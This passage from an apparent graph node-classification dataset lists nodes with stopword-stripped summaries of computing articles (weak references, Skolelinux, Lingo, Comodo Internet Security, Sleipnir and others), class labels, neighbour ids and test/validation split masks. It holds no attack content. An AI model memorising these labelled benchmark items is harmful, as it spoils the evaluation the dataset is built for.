tree tree structure often imposed notion object ownership ownership relationships strong form tree non-ownership relationships weak needed form tree – approach common c++ pre-c++11 using raw pointers weak references approach however downside allowing ability detect parent branch removed deleted since c++11 standard solution added using shared_ptr weak_ptr inherited boost framework weak references also used minimize number unnecessary objects memory allowing program indicate objects minor importance weakly referencing languages multiple levels weak reference strength example java order decreasing strength soft weak phantom references defined package java.lang.ref reference type associated notion reachability garbage collector gc uses object type reachability determine free object safe gc free object softly reachable gc may decide believes jvm spare memory e.g jvm lots unused heap space gc free weakly reachable object soon gc notices object unlike reference types phantom reference followed hand phantom references provide mechanism notify program object freed notification implemented using referencequeues c weak references distinguished whether track object resurrection distinction occur strong references objects finalized strong references default c weak reference track resurrection meaning weak reference updated object resurrected called short weak references weak references track resurrection called long weak references non-garbage-collected languages c++ provide weak/strong reference functionality part supporting garbage collection libraries boost c++ library provides strong weak references mistake use regular c++ pointers weak counterparts smart pointers usage removes ability detect strong reference count gone 0 object deleted worse yet n't allow detection whether another strong reference already tracking given plain pointer introduces possibility two smart pointers tracking plain pointer causes corruption soon one smart pointers reference count reaches 0 object gets deleted weak references useful keeping list current variables referenced application list must weak links objects otherwise objects added list referenced persist duration program java 1.2 1998 introduced two kinds weak references one known “ soft reference ” intended used maintaining gc-managed in-memory caches ’ work well practice simply “ weak reference ” also added related experimental mechanism dubbed “ phantom references ” alternative dangerous inefficient finalize mechanism weak reference created elsewhere code codice_1 used get actual object weak reference n't strong enough prevent garbage collection may strong references object codice_1 suddenly starts returning null another use weak references writing cache using example weak hash map one store cache various referred objects via weak reference garbage collector runs — example application memory usage gets sufficiently high — cached objects longer directly referenced objects removed cache objective-c 2.0 garbage collection also automatic reference counting affected weak references variables properties following example weak difference codice_3 codice_4 codice_5 codice_6 object variable pointed deallocated whether value variable going changed codice_3 ones updated codice_8 codice_5 one left unchanged dangling pointer codice_3 references added objective-c since mac os x 10.7 lion ios 5 together xcode 4.1 4.2 ios using arc older versions mac os x ios gnustep support codice_5 references weak ones",
    "neighbors": [
      2304,
      8582,
      4747,
      3212,
      5008,
      9490,
      11539,
      11674,
      3871,
      10783,
      1954,
      2339,
      5677,
      814,
      1715,
      566,
      3512,
      572,
      10684,
      2625,
      1474,
      1736,
      4424,
      6730,
      6221,
      5840,
      338,
      5074,
      6868,
      86,
      10198,
      5080,
      5853,
      7133,
      1247,
      8545,
      6502,
      10470,
      2152,
      3562,
      7403,
      8554,
      10478,
      8303,
      3577,
      634,
      8573,
      7039
    ],
    "mask": "Test"
  },
  {
    "node_id": 542,
    "label": 3,
    "text": "Relative_identifier:relative identifier context microsoft windows nt line computer operating systems relative identifier rid variable length number assigned objects creation becomes part object security identifier sid uniquely identifies account group within domain relative id master allocates security rids dcs assign new ad security principals users groups computer objects also manages objects moving domains relative id master one role flexible single master operation assigning rid",
    "neighbors": [
      8976,
      3723
    ],
    "mask": "Test"
  },
  {
    "node_id": 543,
    "label": 2,
    "text": "Skolelinux:skolelinux skolelinux/debian-edu operating system intended educational use debian pure blend free open source software project founded norway 2001 internationally developed name direct translation school linux norwegian skole derived latin word schola skolelinux offers four different installation profiles one compact disk easily install pre-configured educational network including main server workstations thin client-servers short major goals skolelinux project started july 2 2001 twenty-five computer programmers translators agreed improve use software education disliked next generation computer users able access source code arguing children interested able learn expert programmers create software developers especially translators interested providing computer programs students native languages developers thought students able navigate internet road signs would understand skolelinux project associated member organisation linux schools founded july 16 2001 linux schools later changed name free software schools annual meeting october 16 2004 german teachers developers translators joined skolelinux throughout 2002 2003 skolelinux included step-by-step standard part debian since 2003 many developers around world joined project developers france greece germany active skolelinux project also cooperates many free educational software projects ltsp gnulinex edubuntu k12ltsp kde gnome firefox openoffice.org similar organisations also established spain germany latvia france brasil denmark skolelinux major contributor rewriting debian-installer addition skolelinux conducted extensive development testing thin clients diskless workstations part new ltsp version 5 total 214 schools using skolelinux currently listed debianedu wiki case study implementing skolelinux school greece typical user experiences skolelinux development sponsored slx debian labs foundation yearly basis norwegian ministry education ministry reform administration sponsored project also private donors companies provided sponsorship helps organize 7–10 developer gatherings annually norway spain germany",
    "neighbors": [
      5380,
      8837,
      1416,
      7435,
      10127,
      2321,
      5397,
      4887,
      8727,
      10394,
      4123,
      673,
      3745,
      10530,
      9253,
      6694,
      10149,
      11305,
      8621,
      7854,
      7983,
      10926,
      2738,
      4790,
      823,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      8907,
      3407,
      6991,
      1110,
      5078,
      7384,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      5356,
      7020,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      3828,
      6389,
      9461,
      10860,
      6393,
      11388,
      8957,
      1406
    ],
    "mask": "None"
  },
  {
    "node_id": 544,
    "label": 9,
    "text": "Lingo_(programming_language):lingo programming language lingo verbose object-oriented oo scripting language developed john h. thompson use adobe director formerly macromedia director lingo used develop desktop application software interactive kiosks cd-roms adobe shockwave content lingo primary programming language adobe shockwave platform dominated interactive multimedia product market 1990s various graphic adventure games developed lingo 1990s including journeyman project total distortion didi ditto series hundreds free online video games developed using lingo published websites miniclip shockwave.com lingo used build user interfaces manipulate raster graphics vector graphics 3d computer graphics data processing tasks lingo supports specialized syntax image processing 3d object manipulation 3d meshes also created fly using lingo lingo invented john h. thompson macromind 1989 first released director 2.2 jeff tanner developed tested lingo director 2.2 3.0 created custom xobjects various media device producers language extension examples using xfactory including xfactory application programming interface api wrote initial tutorials use lingo dave shields tested documented object-based lingo director 3.13 4.0 ran build scripts create weekly releases testing originated macromedia knowledgebase created examples write lingo xtra plug-ins c++ assembled golden master disks macromedia director shipped duplicator lingo quickly adopted burgeoning multimedia community 1990s already popular director product initially 90 users used 10 lingo features primarily codice_1 multimedia authors tutorials presentations however 10 users game developers took wider interest 90 abilities including function extensions creating xfactories/xobjects journeyman project prominent example lingo embedded adobe director added scripts objects timeline lingo object-oriented programming oop language supports smalltalk-like verbose syntax oo dot syntax inheritance lingo created verbose syntax designed mimic spoken language would easy new users users could write hypertalk-like sentences go statements optional unlike programming languages go statements reference frames director score specific code lines lingo also initially robust providing object generation notion called codice_2 led language extensibility external factories xfactories xobjects director 3.13 later versions extensibility occurred via different type plug-in called xtra based upon microsoft component object model com although still possible use verbose syntax current version language fully supports oo dot syntax code looks like standard programming languages javascript c++ equivalent new scripting style would format uses elements director object model introduced director mx 2004 syntax prior versions would like 4 types lingo scripts director specific purpose type script may added certain types compatible objects behavior parent scripts encourage good object-oriented programming movie scripts oop-oriented however still used make black-box handlers objects input raw data receive answers back without knowing inner workings box using strengths ease-of-use director programming methodology advantages oop makes powerful fast programming environment lingo supports object inheritance slightly idiosyncratic system script codice_3 property references another object usually also script although objects cast members also ancestors properties methods ancestor inherited parent behavior scripts also kind ancestor sprites attached since properties methods behavior accessed reference sprite case kind multiple inheritance one sprite may several behaviors lingo 3.0 also extensible external factories xfactories xobjects later replaced lingo xtras provided programmatic extensions director example controlling external media devices cd-rom video tape players macintosh serialport xobject api openly available developers media device producers added popularity versatility lingo macromind active positioning xobject api standard external media devices collaborate lingo interest standard achieved lot involvement prominent burgeoning media product companies ad hoc group called multimedia association starting director version 4.0 lingo extensible new improved class external plugin called xtras xtras developed c++ using microsoft component object model com standardization com helped attract developers creating market plug-ins imaging lingo introduced director 8.0 allowed developers write high-performance image manipulation commands using simple syntax similarities functions image applications like photoshop make easy create dynamic code-based visual effects image manipulation also added actionscript 3.0 bitmapdata class included sophisticated commands director also updated allow conversion bitmapdata object image objects director 8.5 introduced directx 3d engine could scripted lingo lingo updated substantially support new 3d objects includes full-featured set 3d commands xtra also created enable use havok 3d physics engine later ageia physx engine director 11 languages perhaps well known macromedia language however legal anomaly remains uk trademark word 'lingo held linn smart computing",
    "neighbors": [
      9185,
      4486,
      3462,
      10097,
      5588,
      9780,
      11637,
      1916,
      2943
    ],
    "mask": "Validation"
  },
  {
    "node_id": 545,
    "label": 7,
    "text": "Live_distributed_object:live distributed object live distributed object also abbreviated live object refers running instance distributed multi-party peer-to-peer protocol viewed object-oriented perspective entity distinct identity may encapsulate internal state threads execution exhibits well-defined externally visible behavior key programming language concepts applied live distributed objects defined follows semantics behavior live distributed objects characterized terms distributed data flows set messages events appear instances live object endpoint forms distributed data flow early ideas underlying concept live distributed object influenced rich body research object-oriented environments programming language embeddings protocol composition frameworks dating back least actor model developed early 1970s comprehensive discussion relevant prior work found krzysztof ostrowski ph.d. dissertation term live distributed object first used informally series presentations given fall 2006 icws conference stc conference msr labs redmond wa formally defined 2007 ieee internet computing article originally term used refer types dynamic interactive web content hosted servers data centers rather stored end-user client computers internally powered instances reliable multicast protocols word live expressed fact displayed information dynamic interactive represents current fresh live content reflects recent updates made users opposed static read-only archival content pre-assembled word distributed expressed fact information hosted stored server data center rather replicated among end-user computers updated peer-to-peer fashion stream multicast messages may produced directly end-users consuming content comprehensive discussion live object concept context web development found krzysztof ostrowski ph.d. dissertation general definition presented first proposed 2008 paper published ecoop conference extension term motivated need model live objects compositions objects sense concept inspired smalltalk pioneered uniform perspective everything object jini pioneered idea services objects applied live distributed objects perspective dictates constituent parts includes instances distributed multi-party protocols used internally replicate state also modeled live distributed objects need uniformity implies definition live distributed object must unify concepts live web content message streams instances distributed multi-party protocols first implementation live distributed object concept defined ecoop paper live distributed objects platform developed krzysztof ostrowski cornell university platform provided set visual drag drop tools composing hierarchical documents resembling web pages containing xml-serialized live object references visual content chat windows shared desktops various sorts mashups could composed dragging dropping components representing user interfaces protocol instances onto design form connecting together since moment creation number extension developed embed live distributed objects microsoft office documents support various types hosted content google maps march 2009 platform actively developed creators",
    "neighbors": [
      8640,
      9441,
      2980,
      1509,
      5029,
      8070,
      8262,
      10020,
      4490,
      5677,
      11612,
      4788,
      119,
      11674,
      8252,
      8221,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 546,
    "label": 8,
    "text": "List_of_free_and_open-source_web_applications:list free open-source web applications web applications traditional web 2.0 operated software running somewhere list free software used run alternative web applications also listed similar proprietary web applications users may familiar software server-side software often running web server",
    "neighbors": [
      3969,
      7810,
      9347,
      132,
      6276,
      8582,
      10631,
      7561,
      394,
      4623,
      10255,
      916,
      8084,
      11418,
      4636,
      3229,
      9245,
      5663,
      10270,
      292,
      4777,
      3114,
      4011,
      5546,
      5677,
      7980,
      2864,
      692,
      823,
      7223,
      2236,
      6718,
      9151,
      10687,
      6338,
      8644,
      10088,
      3654,
      5703,
      7626,
      1101,
      4301,
      8909,
      10317,
      8147,
      3030,
      5335,
      728,
      11353,
      8539,
      10971,
      6622,
      3296,
      225,
      4192,
      9953,
      10851,
      9320,
      4841,
      6890,
      7913,
      8554,
      237,
      1646,
      7022,
      9967,
      8177,
      11120,
      5747,
      9332,
      2550,
      5369,
      6910
    ],
    "mask": "None"
  },
  {
    "node_id": 547,
    "label": 9,
    "text": "Label_(computer_science):label computer science label programming language sequence characters identifies location within source code languages labels take form identifier often followed punctuation character e.g. colon many high level programming languages purpose label act destination codice_1 statement assembly language labels used anywhere address example operand codice_2 codice_3 instruction also pascal derived variations languages fortran basic support numeric labels labels also used identify entry point compiled sequence statements e.g. debugging c label identifies statement code single statement multiple labels labels indicate locations code reaching label effect actual execution function labels consist identifier followed colon label points statement function identifier must unique within function functions may use name label label identifiers occupy namespace – one variables functions name label error label statement goto used jump labeled statement code codice_4 program execution continues statement label two types labels put switch statement case label consists keyword codice_5 followed expression evaluates integer constant default label consists keyword codice_6 case labels used associate integer value statement code switch statement reached program execution continues statement case label value matches value parentheses switch case label default label program execution continues statement default label default label program execution continues switch within single switch statement integer constant associated case label must unique may may default statement restriction order labels within switch requirement case labels values evaluate integer constants gives compiler room optimizations top //label outermost for-loop var 0 4 i++ alert i= j= j //i=2 j=3",
    "neighbors": [
      1952,
      477,
      8262,
      8524,
      10510,
      655,
      9330,
      6739,
      3960,
      2936,
      2045,
      3999
    ],
    "mask": "Validation"
  },
  {
    "node_id": 548,
    "label": 3,
    "text": "NEAT_chipset:neat chipset neat chipset acronym standing new enhanced 4 chip vlsi implementation including 82c206 ipc control logic used ibm pc compatible pc/at computers consists 82c211 cpu/bus controller 82c212 page/interleave ems memory controller 82c215 data/address buffer 82c206 integrated peripherals controller ipc neat official designation cs8221 developed chips technologies neat chipset descended first chipset c developed ibm xt-compatible systems based around 82c100 xt controller chip 82c100 incorporated functionality invention discrete ttl chips xt mainboard namely ibm pc compatibility provided c 82c206 integrated peripheral controller ipc introduced c 1986 chip like predecessor 82c100 provided equivalent functionality ttl chips pc/at mainboard namely neat cs8221 predecessor called cs8220 required six chips buffers memory controllers virtually complete motherboard neat required four eventual successor neat chipset 82c235 single chip scat amalgamated chips neat chipset single chip manufacturers produced equivalent chips opti example produced two-chip controller chipset comprising opti 82c206 82c495xlc found many early 80486 pentium at-compatible machines opti 82c206 pin function compatible c 82c206 82c495xlc incorporated additional memory controller shadow ram support",
    "neighbors": [
      6889,
      4203,
      780,
      8301,
      7151,
      6129,
      6321,
      8851,
      6453,
      6806,
      2525
    ],
    "mask": "None"
  },
  {
    "node_id": 549,
    "label": 7,
    "text": "Benefitalign:benefitalign benefitalign cloud-based saas company based albuquerque nm united states offices dubai india benefitalign founded girish panicker 2011 develops custom software products healthcare market best known products include stateengage healthplanengage brokerengage benefitalign american software company primarily develops licenses supports sells software related services health care industry benefitalign also provides contact center services crm consulting services company found early success rapid changes healthcare industry result patient protection affordable care act 2010 ppaca encouraging health care industry implement consumer friendly technologies self-service models benefitalign ’ cloud based solution complimented new movement allowing customers quickly set-up customize new sales channels benefitalign platform enterprise system provides crm based infrastructure manage member data provide extensibility across enterprise allowing platform developed needed benefitalign initially launched 2011 girish panicker health care software development consultancy specifically created speridian focus selling quote card shopping enrollment software healthcare market 2013 company connected nearly 1 million consumers health plans multiple states supported several state exchanges october 2013 benefitalign launched three major health plans using integrated oracle siebel benefitalign platform florida virginia arizona avmed health plans launched florida initially served 300,000 people optima health provided coverage 450,000 people virginia university arizona ’ health plans arizona 150,000 members",
    "neighbors": [
      467
    ],
    "mask": "Test"
  },
  {
    "node_id": 550,
    "label": 4,
    "text": "Comodo_Internet_Security:comodo internet security comodo internet security cis developed distributed comodo group freemium internet security suite includes antivirus program personal firewall sandbox host-based intrusion prevention system hips cis 5.0 cloud antivirus protection spyware scanning capabilities added could clean malware found effectively comodo cleaning essentials developed supplement cis host-based intrusion prevention system comodo host-based intrusion prevention system hips named defense+ designed provide protection unknown malware designed restrict actions unknown applications restrict access important files folders settings windows registry defense+ default refuses unknown program install execute except specifically allowed user file appears comodo whitelist cis 4.0 sandbox added defense+ isolate run unknown applications cis v6 released february 2013 provided major revision user interface significant new features fully sandboxed desktop environment 6 march 2014 comodo announced completion beta testing cis v7 release 7 became official april 2014 release includes new virus monitoring tool called virusscope web filtering features provide control user access web content release 8 became official 3 november 2014 includes enhanced auto-sandboxing features release 10 became official 22 december 2016 includes secure shopping prevention malware intercepting online transactions release 11 became official 26 june 2018 includes many stability performance changes comodo endpoint security manager cesm server product centrally managing security settings security components network endpoint computers cesm manages distribution updates antivirus firewall software antivirus firewall software managed cesm versions software used consumer versions comodo internet security pc magazine lead security analyst neil j. rubenking reviewed comodo firewall pro 3.0 comodo internet security 3.5 3 november 2008 giving 4.5 5 first 2.5 second praised suite firewall capabilities criticized antimalware capabilities 28 may 2009 roboert vamosi pc world reviewed comodo internet security 3.8 gave score 1 5 criticizing disappointing malware detection based av-test result limited feature set three years three version later comodo antivirus results became significantly better 30 january 2012 rubenking reviewed comodo internet security 2012 pro v5.0 giving 4 stars 5 praised support service antimalware features panned effectively default firewall defense+ popups lack parental control antispam antiphishing privacy protection features finally low ratings independent labs 9 january 2013 review techworld awarded comodo internet security pro 2013 4 5 stars concluded cloud-based scanning behaviour analysis joins suite top-notch security tools designed keep pc secure recommended also date mike williams betanews.com reviewed comodo internet security pro 2013 concluded program remains complex total pc beginners suspect average user appreciate largely automatic operation though experts enjoy powerful tools extreme configurability 7 february 2013 comodo internet security complete v6 earned pc magazine editor choice award reviewing software neil j. reubenking gave score 4.5 5 stars commended support service vpn solution comodo secure dns service value price criticized behavior blocker poor anti-phishing capabilities reubenking concluded biggest win comodo internet security complete 2013 n't features support geekbuddy service fixes problem security otherwise using remote assistance virus-free guarantee reimburses damage malware gets past comodo also get reimbursed expenses related identity theft add geekbuddy-powered tuneup tool unusually powerful backup utility 've got winner av-test anti-virus test lab based germany tested comodo products surpass industry standard measured mean score participating products awarded certificate comodo internet security participated tests since 2010 first time february 2013 comodo internet security premium version 6.0 obtained av-test certificate field home products 18 january 2013 matousec independent tester security software analyzed 38 security products proactive defense capabilities ranked comodo internet security 2013 premium v6 number one comodo internet security 2013 tested windows 7 sp1 internet explorer 9 passed 101 110 tests 92 also ranked number 1 2012",
    "neighbors": [
      2049,
      2563,
      1052,
      10790,
      2601,
      6699,
      8753,
      569,
      5178,
      9279,
      10308,
      2118,
      2654,
      106,
      8816,
      115,
      10872,
      5245,
      9341,
      127,
      7809,
      131,
      6797,
      1172,
      156,
      2721,
      2213,
      6823,
      3243,
      1708,
      6834,
      704,
      10433,
      7362,
      202,
      4814,
      7886,
      9423,
      10451,
      1242,
      6364,
      5860,
      10987,
      6382,
      8943,
      9971,
      1273,
      9983,
      1792,
      5891,
      5380,
      4374,
      9496,
      6431,
      10531,
      5924,
      1318,
      8998,
      2859,
      3885,
      8493,
      7983,
      4403,
      9523,
      823,
      11577,
      9537,
      1858,
      11073,
      4421,
      1355,
      10574,
      8024,
      4953,
      9048,
      2907,
      9055,
      9569,
      3942,
      11622,
      4972,
      4464,
      3955,
      4480,
      1417,
      3981,
      10637,
      3482,
      1436,
      4511,
      8614,
      8615,
      10166,
      7103,
      5057,
      1994,
      5069,
      7121,
      10708,
      2005,
      4568,
      11225,
      8668,
      9713,
      6643
    ],
    "mask": "Test"
  },
  {
    "node_id": 551,
    "label": 2,
    "text": "UberStudent:uberstudent uberstudent free open-source computer operating system collection programs aimed toward especially higher education secondary students teachers schools dubbing linux learners uberstudent describes cohesive academic success curriculum integrated installable easy-to-use full-featured learning platform aimed increasing overall student learning academic computer literacy lifelong computer fluency additional aim increase adoption free open-source computing platforms like within higher education secondary schools designed around core academic skills approach student success describes research writing reading studying self-management skills essential students regardless academic major uberstudent described reviewers highly tune student needs loaded student-friendly tools customizations perfect higher education environment succeeding aims aplomb elegance power smart pick getting actual schoolwork done fantastic delicious received positive review chronicle higher education cited uberstudent completeness core academic work user-friendliness free open-source nature sixty days uberstudent official 15 july 2010 release uberstudent 1.0 cicero full edition first non-beta distrowatch ranked popular linux distribution education worldwide 32nd popular overall 316 varied distributions tracked organization weeks 4.1 release ranked fifth-most popular linux distribution world uberstudent current release 4.3 dubbed heraclitus distribution uses dedicated software repository run live cd usb flash drive installed computer harddrive either one mediums support last published version uberstudent 4.3 based ubuntu 14.04 ended may 2019 may 26 2019 website unreachable uberstudent founder lead developer stephen ewen u.s.-based educator specializes postsecondary literacy academic success strategies educational technology began uberstudent said way place set smart dedicated computing tools right amount support hands students whether currently within higher education preparing secondary school stated goal uberstudent students learn really excel core skills habits need become everything academically professional life ewen stated uberstudent part inspired experiences achieving top academic performance assistance educational technology ewen described uberstudent overarching design philosophy one provides unified system learning teaching academic success within said uberstudent takes calls core academic skills approach delineated skills research writing studying self-management required students across academic majors stated uberstudent easily extended specific majors via additional software ewen additionally asserted part due uberstudent open source cross-platform nature well unix-like base geared produce computer fluency among users less natural outcome ewen argued academic institutions increase student learning outcomes economic efficiency broadly adopting open source application system software everyday student academic computing needs additionally argued academic institutions increase involvement developing open source tools uberstudent citing successes bibliographic manager zotero george mason university included among uberstudent set core academic programs nearly uberstudent software free open-source core programs cross-platform adopters avoid vendor lock-in whether windows mac os x linux tech review site dedoimedo reviewed uberstudent containing superb collection smartly selected programs probably best comes serious work stitched fabric operating system tech columnist jack wallen said uberstudent contains many education-specific tools spending first days marveling developers packed one single operating system uberstudent core programs academic work clustered within applications menu entry education organized sub-categories including reading research writing self-management study aids subjects utilities sub-categories addition academic-specific application set reviewers noted uberstudent inclusion templates academic work tons on-board how-to guides welcome additions often missing operating systems uberstudent also contains full range student-oriented programs multimedia games graphics internet several categories within separate menu contains select cloud computing applications described containing additions n't often see elsewhere within stated intent couple user-friendliness security stability uberstudent production releases based xubuntu long term stable releases stems debian linux uberstudent also includes numerous self-developed programs well update manager deb file format manage update platform uberstudent main editions distributed dvd image pre-made disc full edition features xfce desktop environment lightweight edition lxde desktop environment lxde lightweight edition greatly scaled intended solely re-invigorate low-specification older computers fits single cd amid decision feature xfce uberstudent full editions ewen stated uberstudent must prefer stability dependability traditional usability novel comes major thing basic desktop environments uses uberstudent 2.0 release cycle ewen criticized designs ubuntu unity gnome 3 shell linux desktop environments hindrances student academic computing productivity 2011 april fools day satire announced uberstudent dumbed edition featuring gnome 3 shell pointing called enforced helplessness leading learned helplessness says gnome 3 developers designed new desktop environment stated intent behind spoof uberstudent edition obscure obvious easy continually avoided students thus never learned may 2011 interview ewen expanded criticisms unity gnome 3 citing specific usability issues stated uberstudent plans adopt either unity gnome 3 shell amid uberstudent 3.0 release cycle ewen criticized cinnamon desktop environment developed linux mint pointing called major shortcomings cinnamon stipulated failure honor certain fundamental freedesktop.org standards ewen stated desktop environment holds promise cinnamon full may 2013 version 1.8 release actually beta-quality software characterized cinnamon yet suited serious stable workstation according ewen uberstudent dubs major releases famous historical thinker practice describes fitting light uberstudent educational mission far thinkers greek roman uberstudent version 0.9 first beta released 15 january 2010 named thales version 1.0 released 15 july 2010 named cicero 1.0 also brief pre-release edition inadvertently reviewed release edition uberstudent 1.0 cicero lightweight edition released 4 september 2010 inherited name cicero full edition uberstudent 2.0 dubbed plato uberstudent 3.0 dubbed aristotle 4.0 release socrates current release 4.3 dubbed heraclitus 5.0 delayed son diagnosed acute lymphoblastic leukemia link post http //uberstudent.com/phpbb/viewtopic.php f=3 t=1315",
    "neighbors": [
      4194,
      5612,
      8177,
      5363,
      5397,
      823,
      1150,
      7483,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 552,
    "label": 4,
    "text": "Ilfak_Guilfanov:ilfak guilfanov ilfak guilfanov born 1966 software developer computer security researcher blogger became well known issued free hotfix windows metafile vulnerability 31 december 2005 unofficial patch favorably reviewed widely publicized official patch initially available microsoft microsoft released official patch 5 january 2006 guilfanov born small village tatarstan region russia tatar family graduated moscow state university 1987 bachelor science mathematics lives liège belgium works hex-rays systems architect main developer ida pro hex-rays commercial version interactive disassembler guilfanov created freeware version reverse engineering tool also available",
    "neighbors": [
      6550,
      10173,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 553,
    "label": 2,
    "text": "Virtual_Machine_Communication_Facility:virtual machine communication facility ibm virtual machine communication facility vmcf feature vm/370 operating system introduced release 3 1976 provides method communication data transfer virtual machines operating vm/370 system vmcf uses paravirtualization diagnose instruction vmcf codice_1 function send data blocks 2048 bytes one virtual machine another receiving virtual machine accesses data thru diagnose codice_2 function",
    "neighbors": [
      7217,
      4862,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 554,
    "label": 7,
    "text": "Stickers_as_a_Service:stickers service stickers service saas category cloud computing services provides digital stickers messaging apps photo editing software model stickers sold stores integrated messaging apps chat photo editing software used method generate revenue besides in-app advertising non-intrusive saas offerings may include handling micro payments sticker shop integration content management systems developing apps similar software service saas platform service paas stickers service enables developers build full sticker stores apps lines code digital stickers tend depict either original well-known characters used chat sessions users act large sized emoji express emotions decoration photographs stickers vary original characters popular manga anime gaming characters movie tie-ins purchased downloaded free apps sticker stores installed limited edition stickers may also gained via special occasions achievements used alternative emoji emoticons expressive form communication variety designs art styles",
    "neighbors": [
      2208,
      4194,
      467
    ],
    "mask": "Validation"
  },
  {
    "node_id": 555,
    "label": 2,
    "text": "Richard_Fontana:richard fontana richard fontana lawyer united states particularly known work area open source free software fontana works red hat red hat counsel software freedom law center sflc 2012 fontana began drafting copyleft-next modification gnu general public license version 3 gplv3 sflc fontana one three principal authors along richard stallman eben moglen gplv3 gnu lesser general public license version 3 lgplv3 gnu affero general public license currently member-elected director open source initiative fontana attended hunter college high school new york city received bachelor degree history wesleyan university master degree computer science yale university law degree university michigan law school",
    "neighbors": [
      1394,
      8436,
      9455
    ],
    "mask": "Test"
  },
  {
    "node_id": 556,
    "label": 3,
    "text": "ARM_System-on-Chip_Architecture:arm system-on-chip architecture arm system-on-chip architecture book detailing system-on-chip arm architecture specific implementation reduced instruction set computing written steve furber co-designed arm processor sophie wilson book content covers architecture assembly language programming support mechanisms high-level programming languages instruction set building operating systems thumb instruction set also covered detail cited numerous academic papers recommended working development embedded systems",
    "neighbors": [
      9964,
      9391,
      7983,
      9330,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 557,
    "label": 2,
    "text": "Berkeley_Timesharing_System:berkeley timesharing system berkeley timesharing system pioneering time-sharing operating system implemented 1964 1967 university california berkeley designed part project genie marketed scientific data systems sds 940 computer system first commercial time-sharing allowed general-purpose user programming including machine language mid-1960s computers used batch processing one user time interactivity pioneering systems atlas supervisor university manchester compatible time-sharing system mit dartmouth time sharing system dartmouth college required large expensive machines implementation started 1964 arrival sds 930 modified slightly operating system written scratch students worked berkeley timesharing system included undergraduates chuck thacker l. peter deutsch doctoral student butler lampson heart system monitor roughly usually called kernel executive roughly usually called command-line interface system working max palevsky founder scientific data systems first interested selling product thought timesharing commercial demand however customers expressed interest put sds pricelist expensive variant 930 november 1967 sold commercially sds 940 august 1968 version 2.0 announced called sds 940 time-sharing system timesharing systems generally one-of-a-kind systems limited single application teaching dartmouth basic 940 first allow general-purpose programming sold 60 units large today standards significant part sds revenues one customer bolt beranek newman tenex operating system pdp-10 mainframe computer used many features sds 940 time-sharing system system extended memory management include demand paging concepts operating system also influenced design unix whose designer ken thompson worked sds 940 berkeley qed text editor first implemented butler lampson l. peter deutsch berkeley timesharing system 1967 another major customer tymshare used system become usa best known commercial timesharing service late 1960s 1972 tymshare alone 23 systems operation",
    "neighbors": [
      6529,
      2179,
      11075,
      2248,
      4492,
      7983,
      8879,
      273,
      6675,
      5492,
      86,
      8474
    ],
    "mask": "Test"
  },
  {
    "node_id": 558,
    "label": 8,
    "text": "Personal_web_server:personal web server personal web server pws system hardware software designed create manage web server desktop computer used learn set administer website also serve site testing dynamic web pages one main functions pws provide environment web programmers test programs web pages therefore pws supports common server-side programming approaches used production web servers personal web server personal server short allows users store selectively share publish information web home network unlike types web servers personal web server owned controlled individual operated individual needs instead company implemented different ways personal web server conceptually opposite web server website operated third parties software service saas cloud model",
    "neighbors": [
      225,
      4194,
      8132,
      9580,
      467,
      119,
      6618
    ],
    "mask": "Test"
  },
  {
    "node_id": 559,
    "label": 5,
    "text": "Sleipnir_(web_browser):sleipnir web browser sleipnir tabbed web browser developed fenrir inc browser main features customization tab functions supports html5 different layout engines names sleipnir fenrir animals norse mythology sleipnir originally created japanese released english chinese translations translations performed volunteer translators available ios macos microsoft windows android windows phone sleipnir originally developed yasuyuki kashiwagi november 2004 computer containing sleipnir source code stolen 2005 kashiwagi established fenrir co. start development new version sleipnir starting version 2 new versions compatible original 2006 sleipnir 6 market share japan sleipnir one twelve browsers originally offered browser ballot screen eu edition windows 7 xp vista update users could choose internet explorer browsers installation process stable version 5.0 released december 24 2013 latest blink engine latest stable version 6.0 windows version browser layout engine changed internet explorer trident mozilla gecko supported version 3.5.0.4000 support webkit rendering engine implemented gecko rendering engine support terminated features include tab grouping mouse gestures page zooming search bar greasemonkey-like user script support plugin support bookmarks sleipnir synced different platform using function called fenrir pass sleipnir version 5 onward introduce proprietary text rendering visually resembling mac os text rendering feature mentioned mac feature set sleipnir 2 windows sleipnir 2 features customizable functions add-ons created users sleipnir 2 one browsers still support windows 98 sleipnir 3 windows includes tab options tab groups touchpaging flick tabs using mouse mouse gestures sleipnir 3 mac switch tabs swiping tabs left right-click operate tabs using gestures tiledtab pinch-in trackpad view list tabs hold go hold link open background ad block tab groups managing tabs sync bookmarks devices using fenrir pass standard full-screen mac os x lion sleipnir 4 windows sleipnir 4 windows introduced minor interface improvements smart tabs adding positioning deletion tabs determined based relationship previous next tabs 150 mouse gesture functions added google chrome extensions support sleipnir 4 mac thumbnail tab navigation open tabs shrunk anymore instead presented scrollable list tab titles appearing mouse hover portal field bar double functionality navigation bar search tiledtab view mode gives overview opened tabs allows sorting tabs six groups improved gesture controls sleipnir 5 windows sleipnir 5 windows integrated features introduced sleipnir 4 mac smooth osx-like font rendering engine introduced site updates feature shows personalized recommendations articles often visited sites added touch screen support sleipnir 6 windows sleipnir 6 windows adds favtab quick navigation favorite sites smartsearch searching via highlighting resizable portal field sleipnir mobile following mobile versions sleipnir smartphones released android ios windows phone early gecko-based versions sleipnir windows scored positive reviews cnet design functionality noticeably inclusion gestures “ action smooth natural lot like scrolling pages phone thumb. ” osx version review makeuseof followed generally line additionally bringing attention convenient tab management macworld reviewing sleipnir 4 mac praised url bar changed “ opera pioneered idea sleipnir ’ tabs remain constantly visible strike nice balance large enough identify small enough intrude main browser window. ” despite version 4 criticized poor performance compared browsers using webkit later versions sleipnir received positive reviews softpedia due browsers customizability features availability mobile versions “ sleipnir proves stable fast web browser comes innovative functions various customization possibilities extra security features together smartphone web apps linking features make viable alternative popular competitors. ” 2012 multiple performance tests tom hardware android version sleipnir placed third spot best browser android outrun dolphin maxthon",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      2076,
      9757,
      7713,
      10791,
      9770,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      5205,
      6231,
      8281,
      6747,
      6237,
      1642,
      9834,
      9841,
      115,
      9843,
      4728,
      637,
      1664,
      2182,
      6797,
      11418,
